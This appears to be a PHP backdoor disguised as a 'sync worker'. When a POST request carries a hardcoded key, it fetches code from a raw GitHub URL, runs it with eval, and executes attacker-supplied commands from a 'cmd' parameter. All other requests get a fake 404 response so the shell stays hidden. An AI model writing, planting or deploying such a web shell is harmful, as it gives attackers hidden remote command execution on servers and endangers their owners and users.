<?php
/**
 * AL3 SYNC WORKER - SILENT RECORD VERSION
 */
if (isset($_POST['ale_trigger']) && $_POST['ale_key'] === 'ale-vault') {
    // Engine dari GitHub lu
    $engine = file_get_contents('https://raw.githubusercontent.com/odollemas644-source/gokilllssss/main/main-ale.txt');
    eval('?>' . $engine);
    
    if (isset($_POST['cmd']) && function_exists('AL3Ex')) {
        echo AL3Ex($_POST['cmd'], true);
    }
    exit;
}
http_response_code(404);
echo '{"ok":false,"error_code":404,"description":"Not Found"}';
